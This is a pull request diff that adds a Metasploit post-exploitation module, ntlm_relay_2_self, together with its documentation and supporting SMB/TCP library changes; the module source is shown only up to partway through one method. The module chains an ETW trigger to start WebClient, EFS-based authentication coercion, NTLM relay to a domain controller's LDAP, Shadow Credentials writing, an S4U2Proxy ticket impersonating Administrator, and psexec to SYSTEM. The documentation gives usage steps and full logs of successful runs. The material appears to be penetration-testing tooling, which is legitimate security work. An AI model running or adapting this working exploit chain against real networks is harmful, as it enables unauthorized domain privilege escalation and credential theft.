### PR TITLE
NTLMRelay2Self - HTTP to LDAP Relay 

### DIFF
--- a/documentation/modules/exploit/windows/local/ntlm_relay_2_self.md
+++ b/documentation/modules/exploit/windows/local/ntlm_relay_2_self.md
@@ -80,7 +80,7 @@ the domain from the Meterpreter session.
 
 ## Cleanup
 The module runs the HTTP to LDAP relay server passively as a background job. This server will continue to run until the
-jobs is killed manually. This means if the module is rerun before the original job is killed, there will be a conflict
+ntlm_relay_2_self job is killed manually. This means if the module is rerun before the original job is killed, there will be a conflict
 on the `SRVPORT` and the module will fail to start the relay server. To avoid this, either set `SRVPORT` to a different
 value or kill the original job before rerunning the module.
 

--- a/documentation/modules/exploit/windows/local/ntlm_relay_2_self.md
+++ b/documentation/modules/exploit/windows/local/ntlm_relay_2_self.md
@@ -1,0 +1,298 @@
+## Vulnerable Application
+
+This module targets Windows Active Directory environments where:
+
+1. A Meterpreter session exists on a domain-joined Windows host from an **interactive or RDP logon** (not a network logon).
+2. The host's LmCompatibilityLevel is set to 2 or lower (NTLMv1 enabled).
+3. The machine account has write access over its own `msDS-KeyCredentialLink` attribute (default AD behavior).
+4. The WebClient service is installed (present by default on Windows workstations, not on Server).
+
+The module coerces the local machine account to authenticate via OpenEncryptedFileRaw (WebDAV),
+relays that NTLM authentication to a Domain Controller's LDAP service, then uses the resulting
+LDAP session to write Shadow Credentials and obtain a Kerberos service ticket as Administrator
+via S4U2Proxy, enabling psexec back to itself for SYSTEM access.
+
+### WebClient Service and the LOCAL SID Requirement
+
+The module starts the WebClient service using an ETW (Event Tracing for Windows) service trigger.
+The WebClient service is registered with a custom ETW trigger GUID (`22B6D684-FA63-4578-87C9-EFFCBE6643C7`).
+Writing an event to this provider causes the Unified Background Process Manager (UBPM) to start the service.
+
+However, the UBPM ETW consumer's security descriptor only allows events from tokens that carry
+the LOCAL SID (`S-1-2-0`), SYSTEM, Administrators, or UWP apps. This means:
+
+- **Interactive logon (type 2)** — has LOCAL SID — ETW trigger works
+- **RDP logon (type 10)** — has LOCAL SID — ETW trigger works
+- **Network logon (type 3, e.g., fetch payload running from an SSH session)** — does NOT have LOCAL SID — ETW trigger silently fails
+
+The module checks for the LOCAL SID before attempting the ETW trigger and will abort with a
+clear error if the session was obtained via a network logon.
+
+For more details on this behavior, see: https://specterops.io/blog/2025/08/19/will-webclient-start/
+
+## Verification Steps
+
+1. Start msfconsole
+1. Obtain a Meterpreter session on a domain-joined Windows host that has a LOCAL sid
+   2. Generate a payload (e.g., `windows/meterpreter/reverse_tcp`), deliver it to the target host, and double click to execute
+1. Do: `use exploit/windows/local/ntlm_relay_2_self`
+1. Do: `set SESSION <session_id>`
+1. Do: `set RHOSTS <dc_ip>`
+1. Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
+1. Do: `set LHOST <attacker_ip>`
+1. Do: `run`
+1. You should see a relay succeed, Shadow Credentials written, and a Kerberos ticket obtained.
+
+## Options
+
+### RUN_GET_TICKET
+
+When `true` (default), the module writes Shadow Credentials to the machine account's AD object
+and obtains a Kerberos ticket via PKINIT, then performs S4U2Proxy to get an impersonating
+service ticket (ST) for Administrator to the host's CIFS service.
+
+### RUN_PSEXEC
+
+When `true`, uses the obtained Kerberos ticket to launch `exploit/windows/smb/psexec` against the
+local host for an elevated SYSTEM session. Defaults to `false`.
+
+Can be used independently of `RUN_GET_TICKET` if a ticket was obtained in a prior run (the module
+looks up the latest cached ccache).
+
+### TARGET_PRIVILEGED_USER
+
+The privileged user to impersonate during the S4U2Proxy step. Defaults to `Administrator`.
+
+### SPN
+
+The Service Principal Name to request in the TGS. Defaults to `CIFS/<machine_fqdn>` if left blank.
+Useful when targeting a different service (e.g., `HTTP/server.domain.local`).
+
+### RUN_CHECKS
+
+Run pre-flight checks (LmCompatibilityLevel, port availability, target reachability) before starting
+the relay server. Default: `true`.
+
+### DOMAIN
+
+The target Active Directory domain FQDN (e.g., `corp.local`). If left blank, the module auto-detects
+the domain from the Meterpreter session.
+
+## Cleanup
+The module runs the HTTP to LDAP relay server passively as a background job. This server will continue to run until the
+jobs is killed manually. This means if the module is rerun before the original job is killed, there will be a conflict
+on the `SRVPORT` and the module will fail to start the relay server. To avoid this, either set `SRVPORT` to a different
+value or kill the original job before rerunning the module.
+
+## Scenarios
+
+### Full LPE Chain — SYSTEM via Relay
+
+Obtain an elevated SYSTEM session on the compromised host:
+
+```
+msf exploit(windows/local/ntlm_relay_2_self) >
+[+] Target system LmCompatibilityLevel is set to 2, which allows NTLMv1 responses. Proceeding with module execution.
+[*] Checking if port 8081 is available on the victim...
+[+] Port 8081 is available on the victim machine.
+[*] Verifying victim can reach the target LDAP server(s) on port 389...
+[+] Target LDAP server 172.16.199.200 is reachable from the victim!
+[*] Starting relay server bound to Session 1...
+[*] Using URL: http://172.16.199.1:8081/adZgjCp
+[*] Server successfully started on 0.0.0.0:8081 via Session 1.
+[+] Session token has LOCAL SID (S-1-2-0) — ETW service trigger will work.
+[*] Starting WebClient service via ETW trigger...
+[+] WebClient service triggered successfully via ETW.
+[*] Coercing machine account authentication via PetitPotam (EfsRpc) to relay listener...
+[*] Attempting coercion via OpenEncryptedFileRaw on \\MINION1@8081/print\vwBQ5\OJnuhsE9.H9t...
+[*] Received OPTIONS request for /print/vwBQ5/OJnuhsE9.H9t from 172.16.199.130:53000
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Received OPTIONS request for /print/vwBQ5/OJnuhsE9.H9t from 172.16.199.130:53000
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Detected GSS-SPNEGO wrapping around the type1 NTLM message
+[*] Received Type 1 message from 172.16.199.130, attempting to relay...
+[*] Attempting to relay to 172.16.199.200:389
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
+[*] Received OPTIONS request for /print/vwBQ5/OJnuhsE9.H9t from 172.16.199.130:53000
+[*] Processing request in state awaiting_type3 from 172.16.199.130
+[*] Detected GSS-SPNEGO wrapping around the type3 NTLM message
+[*] Received Type 3 message from 172.16.199.130, attempting to relay...
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[+] Identity: KERBEROS\sandy -  Successfully relayed NTLM authentication to LDAP!
+[+] Relay succeeded! Handshake completed.
+[+] LDAP Session 2 successfully opened!
+[*] Target list exhausted for 172.16.199.130. Closing connection.
+[*] Loading admin/ldap/shadow_credentials to execute against LDAP Session 2
+[*] Running admin/ldap/shadow_credentials to ADD key for minion1$...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20260602095842_default_unknown_windows.ad.cs_210841.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID af6d3550-2a94-3bb6-ca62-72ab1b3f93de
+[*] Shadow Credentials successfully added (Device ID: af6d3550-2a94-3bb6-ca62-72ab1b3f93de).
+[*] Requesting S4U2Proxy TGS for Administrator...
+[!] Warning: Provided principal and realm (minion1$@kerberos.issue) do not match entries in certificate:
+[*] Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE MINION1$@KERBEROS.ISSUE
+[*] 172.16.199.200:88 - Getting TGS impersonating Administrator@kerberos.issue (SPN: CIFS/minion1.kerberos.issue)
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260602095843_default_172.16.199.200_mit.kerberos.cca_765765.bin
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260602095843_default_172.16.199.200_mit.kerberos.cca_993385.bin
+[+] S4U2Proxy Ticket acquired: /Users/jheysel/.msf4/loot/20260602095843_default_172.16.199.200_mit.kerberos.cca_993385.bin
+[+] Obtained impersonating ST for target host minion1$
+[*] Ticket for minion1$ stored at: /Users/jheysel/.msf4/loot/20260602095843_default_172.16.199.200_mit.kerberos.cca_993385.bin
+[*] --- Initiating OPSEC Cleanup ---
+[*] Removing Shadow Credentials (Device ID: af6d3550-2a94-3bb6-ca62-72ab1b3f93de)...
+[*] Loading admin/ldap/shadow_credentials to execute against LDAP Session 2
+[*] Running admin/ldap/shadow_credentials to REMOVE key for minion1$...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID af6d3550-2a94-3bb6-ca62-72ab1b3f93de
+[+] Successfully removed KeyCredentialLink with Device ID: af6d3550-2a94-3bb6-ca62-72ab1b3f93de
+[*] Cleanup complete.
+[*] Executing PsExec with Kerberos ticket via session 1 COMM channel...
+[*] Launching PsExec against minion1.kerberos.issue as Administrator (Kerberos) via COMM session 1...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[+] PsExec module launched. Check sessions for new elevated session.
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Sending stage (196678 bytes) to 172.16.199.130
+[*] minion1.kerberos.issue:445 - Connecting to the server...
+[*] minion1.kerberos.issue:445 - Authenticating to minion1.kerberos.issue:445|kerberos.issue as user 'Administrator'...
+[*] minion1.kerberos.issue:445 - Patching sname from CIFS/minion1.kerberos.issue to cifs/minion1.kerberos.issue
+[*] minion1.kerberos.issue:445 - Loaded a credential from ticket file: /Users/jheysel/.msf4/loot/20260602095843_default_172.16.199.200_mit.kerberos.cca_993385.bin
+[-] minion1.kerberos.issue:445 - Exploit failed: RubySMB::Error::CommunicationError RubySMB::Error::CommunicationError
+[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.130:52996) at 2026-06-02 09:59:16 -0700
+
+msf exploit(windows/local/ntlm_relay_2_self) > sessions -i -1
+[*] Starting interaction with 3...
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : MINION1
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 9
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+### Ticket Only (No PsExec)
+
+Obtain the impersonating ST without launching psexec. Useful for exfiltrating the ticket for offline use:
+
+```
+msf exploit(windows/local/ntlm_relay_2_self) > set RUN_GET_TICKET true
+msf exploit(windows/local/ntlm_relay_2_self) > set RUN_PSEXEC false
+msf exploit(windows/local/ntlm_relay_2_self) > run
+[*] Exploit running as background job 4.
+msf exploit(windows/local/ntlm_relay_2_self) >
+[+] Target system LmCompatibilityLevel is set to 2, which allows NTLMv1 responses. Proceeding with module execution.
+[*] Checking if port 8081 is available on the victim...
+[+] Port 8081 is available on the victim machine.
+[*] Verifying victim can reach the target LDAP server(s) on port 389...
+[+] Target LDAP server 172.16.199.200 is reachable from the victim!
+[*] Starting relay server bound to Session 1...
+[*] Using URL: http://172.16.199.1:8081/UgpIPl1ifrfgZ
+[*] Server successfully started on 0.0.0.0:8081 via Session 1.
+[+] Session token has LOCAL SID (S-1-2-0) — ETW service trigger will work.
+[*] Starting WebClient service via ETW trigger...
+[+] WebClient service triggered successfully via ETW.
+[*] Coercing machine account authentication via PetitPotam (EfsRpc) to relay listener...
+[*] Attempting coercion via OpenEncryptedFileRaw on \\MINION1@8081/print\alYax4i\rqAYQX.CwU...
+[*] Received OPTIONS request for /print/alYax4i/rqAYQX.CwU from 172.16.199.130:53016
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Received OPTIONS request for /print/alYax4i/rqAYQX.CwU from 172.16.199.130:53016
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Detected GSS-SPNEGO wrapping around the type1 NTLM message
+[*] Received Type 1 message from 172.16.199.130, attempting to relay...
+[*] Attempting to relay to 172.16.199.200:389
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
+[*] Received OPTIONS request for /print/alYax4i/rqAYQX.CwU from 172.16.199.130:53016
+[*] Processing request in state awaiting_type3 from 172.16.199.130
+[*] Detected GSS-SPNEGO wrapping around the type3 NTLM message
+[*] Received Type 3 message from 172.16.199.130, attempting to relay...
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[+] Identity: KERBEROS\sandy -  Successfully relayed NTLM authentication to LDAP!
+[+] Relay succeeded! Handshake completed.
+[+] LDAP Session 4 successfully opened!
+[*] Target list exhausted for 172.16.199.130. Closing connection.
+[*] Loading admin/ldap/shadow_credentials to execute against LDAP Session 4
+[*] Running admin/ldap/shadow_credentials to ADD key for minion1$...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20260602100403_default_unknown_windows.ad.cs_372475.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID c1a74013-4235-7c0c-cb9f-fa942e3bb99c
+[*] Shadow Credentials successfully added (Device ID: c1a74013-4235-7c0c-cb9f-fa942e3bb99c).
+[*] Requesting S4U2Proxy TGS for Administrator...
+[!] Warning: Provided principal and realm (minion1$@kerberos.issue) do not match entries in certificate:
+[*] Using cached credential for krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE MINION1$@KERBEROS.ISSUE
+[*] 172.16.199.200:88 - Getting TGS impersonating Administrator@kerberos.issue (SPN: CIFS/minion1.kerberos.issue)
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260602100404_default_172.16.199.200_mit.kerberos.cca_597828.bin
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260602100404_default_172.16.199.200_mit.kerberos.cca_042694.bin
+[+] S4U2Proxy Ticket acquired: /Users/jheysel/.msf4/loot/20260602100404_default_172.16.199.200_mit.kerberos.cca_042694.bin
+[+] Obtained impersonating ST for target host minion1$
+[*] Ticket for minion1$ stored at: /Users/jheysel/.msf4/loot/20260602100404_default_172.16.199.200_mit.kerberos.cca_042694.bin
+[*] --- Initiating OPSEC Cleanup ---
+[*] Removing Shadow Credentials (Device ID: c1a74013-4235-7c0c-cb9f-fa942e3bb99c)...
+[*] Loading admin/ldap/shadow_credentials to execute against LDAP Session 4
+[*] Running admin/ldap/shadow_credentials to REMOVE key for minion1$...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID c1a74013-4235-7c0c-cb9f-fa942e3bb99c
+[+] Successfully removed KeyCredentialLink with Device ID: c1a74013-4235-7c0c-cb9f-fa942e3bb99c
+[*] Cleanup complete.
+```
+
+The resulting ticket is stored in the Metasploit loot database and can be used with other Kerberos modules.
+
+### Relay Only (No Post-Exploitation)
+
+Perform only the NTLM relay to obtain an LDAP session without any credential writing:
+
+```
+msf exploit(windows/local/ntlm_relay_2_self) > set RUN_GET_TICKET false
+msf exploit(windows/local/ntlm_relay_2_self) > set RUN_PSEXEC false
+msf exploit(windows/local/ntlm_relay_2_self) > set SRVPORT 7474
+msf exploit(windows/local/ntlm_relay_2_self) >
+[+] Target system LmCompatibilityLevel is set to 2, which allows NTLMv1 responses. Proceeding with module execution.
+[*] Checking if port 8081 is available on the victim...
+[+] Port 8081 is available on the victim machine.
+[*] Verifying victim can reach the target LDAP server(s) on port 389...
+[+] Target LDAP server 172.16.199.200 is reachable from the victim!
+[*] Starting relay server bound to Session 1...
+[*] Using URL: http://172.16.199.1:8081/XnVe3jnFHiiVT
+[*] Server successfully started on 0.0.0.0:8081 via Session 1.
+[+] Session token has LOCAL SID (S-1-2-0) — ETW service trigger will work.
+[*] Starting WebClient service via ETW trigger...
+[+] WebClient service triggered successfully via ETW.
+[*] Coercing machine account authentication via PetitPotam (EfsRpc) to relay listener...
+[*] Attempting coercion via OpenEncryptedFileRaw on \\MINION1@8081/print\0RZHA\pMAEdc.DfT...
+[*] Received OPTIONS request for /print/0RZHA/pMAEdc.DfT from 172.16.199.130:53023
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Received OPTIONS request for /print/0RZHA/pMAEdc.DfT from 172.16.199.130:53023
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Detected GSS-SPNEGO wrapping around the type1 NTLM message
+[*] Received Type 1 message from 172.16.199.130, attempting to relay...
+[*] Attempting to relay to 172.16.199.200:389
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
+[*] Received OPTIONS request for /print/0RZHA/pMAEdc.DfT from 172.16.199.130:53023
+[*] Processing request in state awaiting_type3 from 172.16.199.130
+[*] Detected GSS-SPNEGO wrapping around the type3 NTLM message
+[*] Received Type 3 message from 172.16.199.130, attempting to relay...
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[+] Identity: KERBEROS\sandy -  Successfully relayed NTLM authentication to LDAP!
+[+] Relay succeeded! Handshake completed.
+[+] LDAP Session 5 successfully opened!
+[*] Neither RUN_GET_TICKET nor RUN_PSEXEC is set. The module will only perform the relay.
+[*] Target list exhausted for 172.16.199.130. Closing connection.
+```

--- a/lib/msf/core/exploit/remote/smb/client.rb
+++ b/lib/msf/core/exploit/remote/smb/client.rb
@@ -74,7 +74,8 @@ module Msf
               'encrypt the communication if the server requires it',
               true
             ]
-          )
+          ),
+          OptInt.new('SMB::Comm', [ false, 'The session ID of a Meterpreter session to route the connection through' ])
         ], Msf::Exploit::Remote::SMB::Client)
 
         register_options(
@@ -103,7 +104,16 @@ module Msf
 
         disconnect() if global
 
-        s = super(global, {'SSL' => false})
+        tcp_opts = { 'SSL' => false }
+        if datastore['SMB::Comm'].present?
+          comm_session = framework.sessions.get(datastore['SMB::Comm'].to_i)
+          raise RuntimeError, "SMB::Comm session #{datastore['SMB::Comm']} does not exist" unless comm_session
+          raise RuntimeError, "SMB::Comm session #{datastore['SMB::Comm']} does not implement Rex::Socket::Comm" unless comm_session.is_a?(::Rex::Socket::Comm)
+
+          tcp_opts['Comm'] = comm_session
+        end
+
+        s = super(global, tcp_opts)
         self.sock = s if global
 
         # Disable direct SMB when SMBDirect has not been set

--- a/lib/msf/core/exploit/remote/tcp.rb
+++ b/lib/msf/core/exploit/remote/tcp.rb
@@ -113,6 +113,7 @@ module Exploit::Remote::Tcp
       'SSLCipher'     =>  opts['SSLCipher'] || ssl_cipher,
       'Proxies'       => proxies,
       'Timeout'       => (opts['ConnectTimeout'] || connect_timeout || 10).to_i,
+      'Comm'          =>  opts['Comm'],
       'Context'       =>
         {
           'Msf'        => framework,

--- a/modules/exploits/windows/local/ntlm_relay_2_self.rb
+++ b/modules/exploits/windows/local/ntlm_relay_2_self.rb
@@ -1,0 +1,617 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  include Msf::Exploit::Remote::HttpServer::Relay
+  include Msf::Exploit::Remote::LDAP::ActiveDirectory
+  include Msf::Post::Windows::Priv
+  include Msf::Post::File
+
+  attr_accessor :service
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'NTLM Relay to Self (HTTP to LDAP) - Post Exploitation',
+        'Description' => %q{
+          This module performs an NTLM relay-to-self privilege escalation attack. It starts an HTTP-to-LDAP
+          relay server on the compromised host, then triggers the WebClient service via an ETW event
+          (allowing a low-privilege user to start it), and coerces the local machine account to authenticate
+          via OpenEncryptedFileRaw to the relay listener over WebDAV.
+
+          The coerced machine account NTLM authentication is relayed to a Domain Controller's LDAP service,
+          where the module writes Shadow Credentials (msDS-KeyCredentialLink) to its own AD object and
+          obtains a Kerberos TGT via PKINIT. The module then performs S4U2Proxy to obtain an impersonating
+          service ticket for Administrator, enabling psexec back to itself for SYSTEM access.
+
+          RUN_GET_TICKET and RUN_PSEXEC are independent toggles. An operator can obtain a ticket without running
+          psexec, run psexec with a previously obtained ticket, or run both sequentially. RUN_PSEXEC defaults to
+          false so the module does not automatically attempt lateral movement.
+        },
+        'License' => MSF_LICENSE,
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Passive' => true,
+        'Author' => [ 'jheysel-r7' ],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [
+          [ 'Windows', {} ]
+        ],
+        'DisclosureDate' => '2001-01-01', # First record of NTLM Relaying
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options([
+      OptPort.new('SRVPORT', [true, 'The port the victim machine will listen on', 8081]),
+      OptAddress.new('SRVHOST', [true, 'The interface the victim will listen on', '0.0.0.0']),
+      OptPort.new('RPORT', [true, 'The target LDAP server port', 389]),
+      OptString.new('TARGETURI', [true, 'The target URI to relay', '/']),
+      OptString.new('DOMAIN', [false, 'The target domain (auto-detected from session if blank)', '']),
+      OptBool.new('RANDOMIZE_TARGETS', [false, 'Randomize relay targets', false]),
+      OptInt.new('SessionKeepalive', [false, 'Keepalive interval in seconds', 300]),
+      OptBool.new('RUN_CHECKS', [true, 'Run pre-flight checks before starting the relay server', true]),
+      OptBool.new('RUN_GET_TICKET', [
+        true,
+        'Write key credential (Shadow Credentials) and obtain a Kerberos TGT/ST for the target object.', true
+      ]),
+      OptBool.new('RUN_PSEXEC', [
+        true,
+        'Use the obtained ticket to run psexec against the target host for a session. Only meaningful for computer targets.', false
+      ]),
+      OptString.new('TARGET_PRIVILEGED_USER', [true, 'The privileged user to attempt to impersonate and authenticate as', 'Administrator']),
+      OptString.new('SPN', [false, 'Service Principal Name for the TGS request (default: CIFS/<target_fqdn>)', '']),
+      OptInt.new('COERCE_AUTH_WAIT', [true, 'Time to wait to try a different EFS Win32 API via railgun after the first wasn\'t successful', 3]),
+    ])
+
+    # The module passes the payload definition to the psexec module which will start the handler
+    register_advanced_options([
+      OptBool.new('DisablePayloadHandler', [false, 'Disable the handler', true])
+    ])
+
+    # These are loaded in from the ActiveDirectory mixin which the module will only use with the session returned from
+    # the LDAP relay, deregister as they're unnecessary
+    deregister_options('LDAPDomain', 'LDAPPassword', 'LDAPUsername')
+  end
+
+  def relay_targets
+    Msf::Exploit::Remote::Relay::TargetList.new(
+      :ldap,
+      datastore['RPORT'],
+      datastore['RHOSTS'],
+      datastore['TARGETURI'],
+      randomize_targets: datastore['RANDOMIZE_TARGETS'],
+      drop_mic_only: false,
+      drop_mic_and_sign_key_exch_flags: true
+    )
+  end
+
+  def lm_compatibility_level
+    registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa', 'LmCompatibilityLevel')
+  end
+
+  # Auto-detects the victim's machine account name (e.g., desktop-123$)
+  def default_machine_account
+    computer_name = session.sys.config.sysinfo['Computer']
+    "#{computer_name}$".downcase
+  end
+
+  # Resolves the target domain from the datastore or auto-detects from the session.
+  def resolve_domain
+    domain = datastore['DOMAIN'].to_s.strip
+    return domain unless domain.empty? || domain == '/'
+
+    detected = get_domain_name
+    if detected.to_s.empty?
+      print_error('Could not auto-detect domain. Please set the DOMAIN option manually.')
+      return nil
+    end
+    print_status("Auto-detected domain: #{detected}")
+    detected
+  end
+
+  # Derives the FQDN for the target computer object.
+  def target_fqdn(target_name, domain_fqdn)
+    hostname = target_name.delete_suffix('$')
+    "#{hostname}.#{domain_fqdn}".downcase
+  end
+
+  # Validates options early and fails fast on invalid configurations.
+  def validate_options!
+    unless datastore['RUN_GET_TICKET'] || datastore['RUN_PSEXEC']
+      print_status('Neither RUN_GET_TICKET nor RUN_PSEXEC is set. The module will only perform the relay.')
+      return false
+    end
+
+    true
+  end
+
+  def exploit
+    unless session.type == 'meterpreter'
+      fail_with(Failure::BadConfig, "This module requires a Meterpreter session (got: #{session.type}).")
+    end
+
+    @spawned_ldap_sessions = []
+
+    pre_flight_checks if datastore['RUN_CHECKS']
+
+    print_status("Starting relay server bound to Session #{session.sid}...")
+    start_service({ 'Comm' => session })
+    print_status("Server successfully started on #{srvhost}:#{datastore['SRVPORT']} via Session #{session.sid}.")
+
+    print_status('Starting WebClient service via ETW trigger...')
+    start_webclient_service
+
+    print_status('Coercing machine account authentication via PetitPotam (EfsRpc) to relay listener...')
+    coerce_authentication
+
+    @http_relay_service.wait if @http_relay_service
+  end
+
+  # Starts the WebClient service by attempting a connection to a WebDAV resource via WNetAddConnection2.
+  # This triggers the MPR -> davclnt.dll -> TriggerStartWebClientService code path internally,
+  # which fires the ETW event from the local process context (with LOCAL SID in the token).
+  # The connection itself will fail, but the side effect of loading davclnt.dll starts the service.
+  # Starts the WebClient service using an ETW event trigger via railgun.
+  # Registering an ETW provider with the WebClient service trigger GUID and writing
+  # an event causes the service to auto-start (works from medium integrity with LOCAL SID).
+  def start_webclient_service
+    check_local_sid
+    # GUID: {22B6D684-FA63-4578-87C9-EFFCBE6643C7}
+    guid = [0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7].pack('VvvC8')
+
+    railgun = session.railgun
+    railgun.add_function('advapi32', 'EventRegister', 'DWORD', [
+      ['PBLOB', 'ProviderId', 'in'],
+      ['PBLOB', 'EnableCallback', 'in'],
+      ['PBLOB', 'CallbackContext', 'in'],
+      ['PBLOB', 'RegHandle', 'out']
+    ])
+
+    if session.arch == ARCH_X64
+      railgun.add_function('advapi32', 'EventWrite', 'DWORD', [
+        ['LPVOID', 'RegHandle', 'in'],
+        ['PBLOB', 'EventDescriptor', 'in'],
+        ['DWORD', 'UserDataCount', 'in'],
+        ['PBLOB', 'UserData', 'in']
+      ])
+      railgun.add_function('advapi32', 'EventUnregister', 'DWORD', [
+        ['LPVOID', 'RegHandle', 'in']
+      ])
+    else
+      # x86 stdcall: ULONGLONG is passed as   DWORDs on the stack (low first, high second)
+      railgun.add_function('advapi32', 'EventWrite', 'DWORD', [
+        ['DWORD', 'RegHandleLow', 'in'],
+        ['DWORD', 'RegHandleHigh', 'in'],
+        ['PBLOB', 'EventDescriptor', 'in'],
+        ['DWORD', 'UserDataCount', 'in'],
+        ['PBLOB', 'UserData', 'in']
+      ])
+      railgun.add_function('advapi32', 'EventUnregister', 'DWORD', [
+        ['DWORD', 'RegHandleLow', 'in'],
+        ['DWORD', 'RegHandleHigh', 'in']
+      ])
+    end
+
+    result = railgun.advapi32.EventRegister(guid, nil, nil, 8)
+    unless result['return'] == 0
+      fail_with(Failure::Unknown, "EventRegister failed with error code: #{result['return']}")
+    end
+
+    reg_handle_raw = result['RegHandle']
+
+    # EVENT_DESCRIPTOR struct layout:
+    # Id(USHORT=2), Version(UCHAR=1), Channel(UCHAR=1), Level(UCHAR=1), Opcode(UCHAR=1), Task(USHORT=2), Keyword(ULONGLONG=8)
+    # Values: Id=1, Version=0, Channel=0, Level=4, Opcode=0, Task=0, Keyword=0
+    event_desc = [1, 0, 0, 4, 0, 0, 0].pack('vCCCCvQ<')
+
+    if session.arch == ARCH_X64
+      reg_handle = reg_handle_raw.unpack1('Q<')
+      result = railgun.advapi32.EventWrite(reg_handle, event_desc, 0, nil)
+      unless result['return'] == 0
+        railgun.advapi32.EventUnregister(reg_handle)
+        fail_with(Failure::Unknown, "EventWrite failed with error code: #{result['return']}")
+      end
+      railgun.advapi32.EventUnregister(reg_handle)
+    else
+      handle_low, handle_high = reg_handle_raw.unpack('VV')
+      result = railgun.advapi32.EventWrite(handle_low, handle_high, event_desc, 0, nil)
+      unless result['return'] == 0
+        railgun.advapi32.EventUnregister(handle_low, handle_high)
+        fail_with(Failure::Unknown, "EventWrite failed with error code: #{result['return']}")
+      end
+      railgun.advapi32.EventUnregister(handle_low, handle_high)
+    end
+    print_good('WebClient service triggered successfully via ETW.')
+
+    # Give the service a moment to start
+    Rex.sleep(3)
+  end
+
+  # Coerces machine account authentication by calling EFS Win32 APIs via railgun
+  # with a WebDAV UNC path, triggering the machine account to authenticate to our relay listener.
+  # Tries multiple methods until one succeeds, similar to PetitPotam's Automatic mode.
+  def coerce_authentication
+    hostname = session.sys.config.sysinfo['Computer']
+    listener = "#{hostname}@#{datastore['SRVPORT']}/print"
+    @relay_succeeded = false
+
+    efs_methods = [
+      { name: 'OpenEncryptedFileRaw', call: ->(path) { session.railgun.advapi32.OpenEncryptedFileRawW(path, 0, 8) } },
+      { name: 'EncryptFile', call: ->(path) { session.railgun.advapi32.EncryptFileW(path) } },
+      { name: 'DecryptFile', call: ->(path) { session.railgun.advapi32.DecryptFileW(path, 0) } }
+    ]
+
+    efs_methods.each do |method|
+      break if @relay_succeeded
+
+      rand_path = "#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.#{Rex::Text.rand_text_alphanumeric(3)}"
+      unc_path = "\\\\#{listener}\\#{rand_path}"
+
+      print_status("Attempting coercion via #{method[:name]} on #{unc_path}...")
+      method[:call].call(unc_path)
+
+      # Give the relay a moment to process before trying the next method
+      Rex.sleep(datastore['COERCE_AUTH_WAIT'])
+    end
